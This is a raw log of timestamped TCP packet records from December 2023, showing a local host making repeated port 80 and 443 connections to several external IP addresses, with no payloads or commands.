                                                                                                                              Dec 4, 2023 15:22:04.646641970 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.646836996 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.646897078 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.647057056 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.647100925 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.647121906 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.647170067 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.647241116 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.647327900 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:25.870625019 CET5013180192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:22:26.037225962 CET805013154.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:26.037504911 CET5013180192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:22:26.038505077 CET5013180192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:22:26.248805046 CET805013154.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:27.461071014 CET805013154.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:27.461147070 CET805013154.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:27.461199045 CET805013154.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:27.461658001 CET5013180192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:22:27.462486029 CET5013180192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:22:27.632695913 CET805013154.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:50.907150984 CET5013280192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:51.030800104 CET805013274.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:51.031039953 CET5013280192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:51.031161070 CET5013280192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:51.154804945 CET805013274.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:51.160867929 CET805013274.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:51.160942078 CET805013274.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:51.161184072 CET5013280192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:52.543047905 CET5013280192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:53.558655024 CET5013380192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:53.683017969 CET805013374.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:53.683281898 CET5013380192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:53.683531046 CET5013380192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:53.807401896 CET805013374.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:53.813286066 CET805013374.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:53.813358068 CET805013374.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:53.813632965 CET5013380192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:55.198753119 CET5013380192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.214310884 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.338080883 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.338289976 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.339684963 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.464310884 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464379072 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464421988 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464466095 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464507103 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464546919 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464566946 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.464653015 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464706898 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464747906 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464786053 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.464788914 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.464947939 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.465219021 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.588485956 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588551044 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588635921 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588649988 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.588677883 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588710070 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.588718891 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588759899 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588799953 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588839054 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588879108 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588917971 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588932037 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.588956118 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589118004 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589159966 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589200020 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589240074 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589278936 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589390039 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589431047 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589473009 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589512110 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.712461948 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.712483883 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.712747097 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713006973 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713152885 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713314056 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713356972 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713373899 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713526011 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713665009 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713793039 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713917971 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.715848923 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.715868950 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.716008902 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:57.854389906 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:58.870075941 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:58.993549109 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:58.994107962 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:58.994398117 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:59.121046066 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:59.122128010 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:59.122924089 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:59.123100042 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:59.123162985 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:59.246499062 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.618662119 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.728442907 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.728663921 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.728913069 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.870420933 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870501995 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870559931 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870615959 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870646954 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.870662928 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870714903 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870815039 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.870986938 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:14.241472960 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.257042885 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.366803885 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.367463112 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.367646933 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.526899099 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.526979923 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527041912 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527101040 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527153015 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527204990 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527460098 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.527460098 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:16.881455898 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:17.897205114 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.007004976 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.007215023 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.008508921 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.172230005 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.172467947 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.172563076 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.282668114 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282751083 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282830954 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282887936 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282916069 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.282929897 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.283009052 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.283077002 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.283284903 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.336056948 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.336267948 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.394072056 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394148111 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394366026 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.394393921 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394443989 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.394454002 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394498110 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394537926 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394584894 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394661903 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394715071 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394867897 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.446093082 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512762070 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512830019 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512873888 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512993097 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.513305902 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.513370037 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.513606071 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:19.521579981 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.537137032 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.646895885 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.647842884 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.648096085 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.773152113 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773633003 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773732901 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773828983 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773953915 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.773966074 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773979902 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.774013996 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.774087906 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.774255991 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.774455070 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.884263039 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:26.233207941 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:26.404038906 CET805014037.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:26.404387951 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:26.404582024 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:26.576653957 CET805014037.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:26.576931953 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:27.910254955 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:28.925987959 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:29.102554083 CET805014137.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:29.102940083 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:29.103007078 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:29.280168056 CET805014137.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:29.280399084 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:30.612904072 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.628478050 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.804445982 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.804596901 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.805993080 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.806092978 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.982192993 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982289076 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982364893 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982379913 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.982481956 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982534885 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982543945 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.982635975 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982675076 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982698917 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.982698917 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.982774019 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982839108 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982897997 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.982939005 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:32.159240961 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:32.159315109 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:32.159384012 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:32.159429073 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:32.159470081 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.330979109 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.507472038 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.507781982 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.507900953 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.687139034 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687248945 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687321901 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687408924 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687500000 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687572956 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.687618017 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687634945 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.687722921 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687786102 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687828064 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.687870026 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.687931061 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.688102007 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.864106894 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864283085 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864444971 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864471912 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.864532948 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864650965 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864726067 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.864774942 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864869118 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.864967108 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865051031 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.865056992 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865139961 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.865154982 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865251064 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865339041 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865401030 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.865426064 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865521908 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865545034 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.865617037 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865705967 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865729094 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.865797997 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865869999 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.865890980 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.865986109 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.866077900 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:34.866091013 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:34.866286993 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.041918993 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.041997910 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042054892 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042114973 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042169094 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042233944 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042259932 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.042289019 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042316914 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.042342901 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042397022 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042433977 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.042449951 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042499065 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.042504072 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042557955 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042610884 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042668104 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042721033 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042787075 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042799950 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.042843103 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042897940 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042902946 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.042952061 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.042967081 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.043005943 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.043060064 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:35.043109894 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.043421984 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.043539047 CET5014380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:35.219512939 CET805014337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.279772043 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:40.397193909 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.397423029 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:40.397598982 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:40.514535904 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.651324987 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.651396990 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.651437044 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.651494026 CET8050144108.179.192.34192.168.11.20
